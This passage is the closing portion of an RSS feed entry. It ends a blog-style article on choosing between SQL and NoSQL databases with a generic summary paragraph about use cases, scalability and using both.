&lt;p&gt;The choice between SQL and NoSQL databases ultimately depends on your specific use case, data structure requirements, scalability needs, and performance considerations. Many modern applications even utilize both types of databases to leverage the strengths of each approach. Understanding the fundamentals of both paradigms will help you make informed decisions when designing your data architecture.&lt;/p&gt;

</description>
    </item>
  </channel>
</rss>
